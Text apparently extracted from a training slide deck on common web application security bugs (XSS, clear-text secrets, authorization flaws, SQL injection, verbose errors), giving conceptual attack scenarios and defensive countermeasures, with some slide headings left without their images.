Top 5 Web App Security bugs

Cross-Site Scripting

Normal execution

Cross-Site Scripting

What attacker does

Types of Cross-Site Scripting

Non-persistent Attack: 1. A often visits a particular website, which is hosted by B. B's website allows A to log in with a username/password pair and stores sensitive data, such as billing information. 2. C observes that B's website contains a reflected XSS vulnerability. 3. C crafts a URL to exploit the vulnerability, and sends A an email, enticing her to click on a link for the URL under false pretenses. This URL will point to B's website, but will contain C's malicious code, which the website will reflect. 4. A visits the URL provided by C while logged into B's website. 5. The malicious script embedded in the URL executes in A's browser, as if it came directly from B's server (this is the actual XSS vulnerability). The script can be used to send A's session cookie to C. C can then use the session cookie to steal sensitive information available to A(authentication credentials,billing info, etc.) without A's knowledge.

Persistent Attack: 1. C posts a message with malicious payload to a social network. 2. When B(host) reads the message, C's XSS steals B's cookie. 3. C can now hijack B's session and impersonate B.

Prevention to Cross-Site Scripting

-Check that ASP.NET request validation is enabled -Review ASP.NET code that generates HTML output - Review potentially dangerous HTML tags and attributes.

Clear Text Secrets

Sensitive"data like User Credentials, cryptographic keys must never be stored, cached, or sent unencrypted. For instance: logon passwords, PINs, credit card numbers, telephone calling card numbers, session ID that can be used to gain access to goods, services, or confidential information must always be stored and sent encrypted.

Countermeasures to Clear Text Secrets

- Use trusted and proven standard algorithms for encryption Do not store secrets (passwords/ keys) in code Use the aspnet_regiis tool to encrypt configuration settings

Authorization Issues

Direct Object Reference (Normal execution)

Authorization Issues

Direct Object Reference (What attacker does)

Countermeasure to authorization issue

Perform server side authorization Use a platform provided authorization mechanism

URL Authorization Declarative checks

Implement authorization controls in middle tiers like gateways

SQL Injection

User input without sufficient validation is used to create and execute a dynamic SQL statement. User can manipulate the SQL statement that gets executed.

SQL Injection

Normal execution

SQL Injection

What attacker does

Countermeasures to SQL Injection

* Constrain and sanitize input data:
Check for known good data by validating for type, length, format, and range. * Use safe SQL parameters for data access:

If you use a parameters collection, input is treated as a literal value, and SQL Server does not treat it as executable code.
* Use an account that has restricted permissions in the database: Ideally, you should only grant execute permissions to selected stored procedures in the database and provide no direct table access. * Avoid disclosing database error information:

In the event of database errors, make sure you do not disclose detailed error messages to the user.

Verbose Error messages

Leads to

Countermeasures to Verbose Errors

You can display other message in the case of an exception or a particular scenario when the verbose message is displayed as a crash

Other Bugs

Range Check The range of all the similar fields should be uniform. e.g. the phone/mobile number Back button Sometimes the Back Button present in the page causes the user data to be revealed or altered which is very serious in the case on Transactions or user information.

Bug Repetition Suppose a bug-type has been resolved, then the same bug should not be repeated. For e.g. the hotel rule was not being properly updated at an earlier time but after some patch the issue was noticed again.
Session expiry The session expiry time is also non- uniform.

Uniformity of the Error messages The error message displayed should be uniform is terms of the displayed location and type. Scrollbar Suppose the input value for a particular field is large, then there should be a scrollbar present so that the UI of the page does not gets affected.

Feedback / QnA